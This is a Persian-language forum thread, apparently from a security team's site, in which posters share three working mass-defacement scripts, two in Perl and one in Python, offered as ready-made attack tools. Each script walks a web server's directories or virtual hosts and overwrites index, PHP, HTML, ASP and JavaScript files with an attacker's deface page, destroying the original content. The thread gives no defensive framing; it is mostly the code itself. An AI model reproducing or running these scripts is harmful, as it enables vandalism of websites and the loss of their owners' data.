رفتن به مطلب

ارسال های توصیه شده

اسکریپت پرل برای مس دیفیس  Mass Deface Script Perl

.

#!/usr/local/bin/perl
################################## ABOUT ###################################################
$VERSION="Version 0.1 by LorD";
$about =
"\n\e[32m--== [ \e[31mIRAN HACKERS SABOATGE Tools for Mass Defacement $VERSION \e[32m] ==--\e[m\n".
"\e[36mContact:\e[m\n".
"\t \e[33m@\e[m\e[34mE-Mail\e[m: \e[36mlord\e[m\e[31m\@\e[m\e[36mihsteam.com\e[m\n".
"\t \e[33m#\e[m\e[34mIRC: \e[36mIRC.Zirc.org\e[m - channel \e[33m#\e[m\e[32mIHS\e[m\n".
"\n\e[31m=-=-=-=-=-=\e[m".
"\n\e[36mInfo:\e[m\n".
"\t\e[33m-d\e[m \e[31m=\e[m \e[33mDiretory that We Want be Massdeface\e[m\n".
"\t\e[33m-f\e[m \e[31m=\e[m \e[33mfile name that u want to attack for mass deafce\e[m\n".
"\t\e[33m-n\e[m \e[31m=\e[m \e[33mlocation of attacker deface page.\e[m\n".
"\e[36mExemplo:\e[m\nperl $0.pl \e[33m-d\e[m /www \e[33m-f\e[m index. \e[33m-n\e[m /tmp/index.html\n".
"\e[31m=-=-=-=-=-=\e[m\n";
############################################################################################
use Getopt::Std;
getopts('d:f:n:', \%args);
if (defined($args{'d'})){$dir=$args{'d'};}else{$dir="";}
if (defined($args{'f'})){$file=$args{'f'};}else{$file="";}
if (defined($args{'n'})){$newfile=$args{'n'};}else{$newfile="";}

print $about;

$dirok="\e[33m[+]\e[m Ok, Diretory that wanna be Massdeface: \e[32m$dir\e[m";
$fileok="\e[33m[+]\e[m Ok, O file name for attack: \e[32m$file\e[m";
$newfileok="\e[33m[+]\e[m Ok, location of attacker index file: \e[32m$newfile\e[m";

if("$dir") {
print "$dirok\n";
sleep(1);
} else {
exit();
}
if("$file") {
print "$fileok\n";
sleep(1);
}
else
{
print "";
exit();
}
if("$newfile") {
print "$newfileok\n";
sleep(1);
}
else
{
print "";
exit();
}

printf "\e[33m[+]\e[m Start Defacing......\n";
my @troca;
find($dir, sub { push(@troca, $_[0]) if ($_[0] =~ /$file/i) });
my $quantidade = scalar(@troca);

if($quantidade<=0) {
print "\e[31m[-]\e[m Erro: Nenhum Arquivo encontrado.\n";sleep(1);
print "\e[31m[-]\e[m Coloque a extencao do arquivo.\n";sleep(1);
print "\e[31m[-]\e[m Ou, Apenas arquivo. [Sem extencao].\n";sleep(1);
exit();
}

printf "\e[33m[+]\e[m Ok, found: \e[32m$quantidade\e[m files...\n";sleep(1);
printf "\e[33m[+]\e[m Defacing index files.\n";
open(NEW, "< $newfile");
foreach $files(@troca)
{
open(FILE, "> $files");
while (<NEW>) {
print FILE $_;
}
close(FILE);
seek(NEW, 0, 0);
}
close(NEW);
sleep(1);
printf "\e[33m[+]\e[m hax0r3d Sucessfull!\n";sleep(1);
printf "\e[33m[+]\e[m Total files that defaced: \e[32m$quantidade\e[m\n";
sub find {
my ($path, $callback) = @_;
$path = '/' unless $path;
$path =~ s/^\/+/\//;
$path =~ s/\/$//;
my @files = list_dir($path);
my @dirs;
foreach my $file (@files) {
my $filepath = $path.'/'.$file;
&{$callback}($filepath);
push(@dirs, $filepath) if (-d $filepath);
}
undef(@files);
map { find($_, $callback) } @dirs;
return(1);
}
sub list_dir {
my ($dir, $dont_list_subdirs) = @_;
opendir(DIR, $dir) || return();
my @files = readdir(DIR);
closedir(DIR);
@files = grep { !-d "$dir/$_" } @files if ($dont_list_subdirs);
my @files = grep { $_ !~ /^(\.){1,2}$/ } @files;
return(@files);
} 

.

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

 • موسس سایت

درود

 

اینم یه اسکریپت پرل دیگه برای مس دیفیس :

#!/usr/bin/perl -w

#Masss Defacer v2.0

# Coded By illuz1oN

# Creditz - Nostur

$def = 'YOUR LAME DEFACE PAGE HERE =)';

{    print "[+]DEFACING...\n";

    print"[+]DEFACING .PHP FILES...\n";

    my @php = glob("*.php"); #Files

  foreach my $deface(@php){

  open(DEFACE, '>', $deface);

  print DEFACE $def || print "[-]Fxcked up: $!\n";

  close(DEFACE)

 }

    print "[+]DEFACING .HTML FILES...\n";

    my @html = glob("*.html"); #Files

  foreach my $deface(@html){

  open(DEFACE, '>', $deface);

  print DEFACE $def || print "[-]Fxcked up: $!\n";

  close(DEFACE)

 }

    print "[+]DEFACING .ASP FILES...\n";

    my @asp = glob("*.asp"); #Files

  foreach my $deface(@asp){

  open(DEFACE, '>', $deface);

  print DEFACE $def || print "[-]Fxcked up: $!\n";

  close(DEFACE)

 }

    print "[+]DEFACING .ASPX FILES...\n";

    my @aspx = glob("*.aspx"); #Files

  foreach my $deface(@aspx){

  open(DEFACE, '>', $deface);

  print DEFACE $def || print "[-]Fxcked up: $!\n";

  close(DEFACE)

 }

    print "[+]DEFACING .HTM FILES...\n";

   my @htm = glob("*.htm"); #Files

  foreach my $deface(@htm){

  open(DEFACE, '>', $deface);

  print DEFACE $def || print "[-]Fxcked up: $!\n";

  close(DEFACE)

 }

    print "[+]DEFACING .JS FILES...\n";

  my @js = glob("*.js"); #Files

  foreach my $deface(@js){

  open(DEFACE, '>', $deface);

  print DEFACE $def || print "[-]Fxcked up: $!\n";

  close(DEFACE)

 }

    print "[+]DEFACING .AC FILES...\n";

    my @ac = glob("*.ac"); #Files

  foreach my $deface(@ac){

  open(DEFACE, '>', $deface);

  print DEFACE $def || print "[-]Fxcked up: $!\n";

  close(DEFACE)

 }

 print "[+]Pages Should Be Defaced!\n";

}

#Coded By illuz1oN

#Credits - Nostur! 

}

موفق باشید.

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

 • 5 سال بعد...

مس دیفیسر Python
 

import os
# commands to get folders
ndir = os.popen("find * -maxdepth 0 -type d | wc -l")
ndir = ndir.read()
ndir = int(ndir)
dirl = os.popen("find * -maxdepth 0 -type d")
dirl = dirl.read()
dirn = []
x = 0
# writing each folder to a list
for i in range(ndir):
  name = ""
  while dirl[x] != '\n':
    name += dirl[x]
    x += 1
  x += 1
  dirn.append(name)
# MassDeface Process
for folder in range(ndir):
  # WebDir path 
  cmd = "cp index.php /var/www/vhosts/"+dirn[folder]+"/httpdocs/"
  os.system(cmd)
  print("http://"+dirn[folder]+"/index.php")

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شرکت گاردایران

پردازشگران ایمن داده ي آدلان

شماره ثبت: 9438

شبکه های اجتماعی

 

نمادها

logo.aspx?id=56084&Code=ybjZVyBlXag5cNRv logo-samandehi

×
×
 • اضافه کردن...

اطلاعات مهم

فعالیت شما در این انجمن به منزله تایید قوانین انجمن میباشد! شرایط استفاده